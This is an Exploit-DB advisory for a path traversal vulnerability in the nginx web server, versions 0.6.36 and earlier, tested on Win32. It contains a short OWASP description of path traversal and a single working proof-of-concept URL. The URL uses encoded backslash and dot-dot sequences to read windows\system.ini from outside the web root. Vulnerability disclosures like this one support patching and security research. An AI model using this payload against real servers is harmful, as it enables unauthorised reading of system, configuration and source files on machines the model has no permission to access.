Nginx 0.6.36 - Directory Traversal

EDB-ID:

12804

CVE:

N/A

Author:

cp77fk4r

Type:

remote

Platform:

Multiple

Published:

2010-05-30

# Exploit Title: nginx [engine x] http server <= 0.6.36 Path Draversal
# Date: 20/05/10
# Author: cp77fk4r | empty0page[SHIFT+2]gmail.com | www.DigitalWhisper.co.il
# Software Link: http://nginx.org/
# Version: <= 0.6.36
# Tested on: Win32
#
##[Path Traversal:]
A Path Traversal attack aims to access files and directories that are stored
outside the web root folder. By browsing the application, the attacker looks
for absolute links to files stored on the web server. By manipulating
variables that reference files with “dot-dot-slash (../)” sequences and its
variations, it may be possible to access arbitrary files and directories
stored on file system, including application source code, configuration and
critical system files, limited by system operational access control. The
attacker uses “../” sequences to move up to root directory, thus permitting
navigation through the file system. (OWASP)
#
http://localhost/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5csystem.ini
#
#
[e0f]